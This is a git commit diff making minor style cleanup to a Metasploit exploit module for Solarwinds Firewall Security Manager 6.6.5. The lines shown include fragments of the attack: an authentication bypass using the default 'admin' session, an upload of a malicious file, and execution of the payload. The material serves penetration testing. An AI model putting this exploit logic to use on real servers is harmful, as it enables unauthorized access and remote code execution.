Do minor cleanup

bug/bundler_fix
jvazquez-r7 2015-04-03 11:53:50 -05:00
parent 0b14a18ad2
commit 7c9b19c6f8
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 7 additions and 7 deletions

View File

@ -54,12 +54,12 @@ class Metasploit3 < Msf::Exploit::Remote
['Solarwinds Firewall Security Manager 6.6.5', {}] ['Solarwinds Firewall Security Manager 6.6.5', {}]
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Mar 13 2015", 'DisclosureDate' => 'Mar 13 2015',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
[ [
OptString.new('TARGETURI', [ true, "Base FMS directory path", '/']) OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
], self.class) ], self.class)
end end
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
# 'admin' is there by default and you can't delete it # 'admin' is there by default and you can't delete it
username = 'admin' username = 'admin'
print_status("Auth bypass: Putting session value: username=#{username}") print_status("Auth bypass: Putting session value: username=#{username}")
sid = put_session_value('admin') sid = put_session_value(username)
print_status("Your SID is: #{sid}") print_status("Your SID is: #{sid}")
# Stage 2 of the attack # Stage 2 of the attack
@ -185,13 +185,13 @@ class Metasploit3 < Msf::Exploit::Remote
if !res if !res
fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.') fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
elsif res && res.body.include?('java.lang.NoClassDefFoundError') elsif res.body.include?('java.lang.NoClassDefFoundError')
print_status("Payload being treated as XLS, indicates a successful upload.") print_status('Payload being treated as XLS, indicates a successful upload.')
else else
print_status("Unsure of a successful upload.") print_status('Unsure of a successful upload.')
end end
print_status("Attempting to execute the payload.") print_status('Attempting to execute the payload.')
exec_file(sid, filename) exec_file(sid, filename)
end end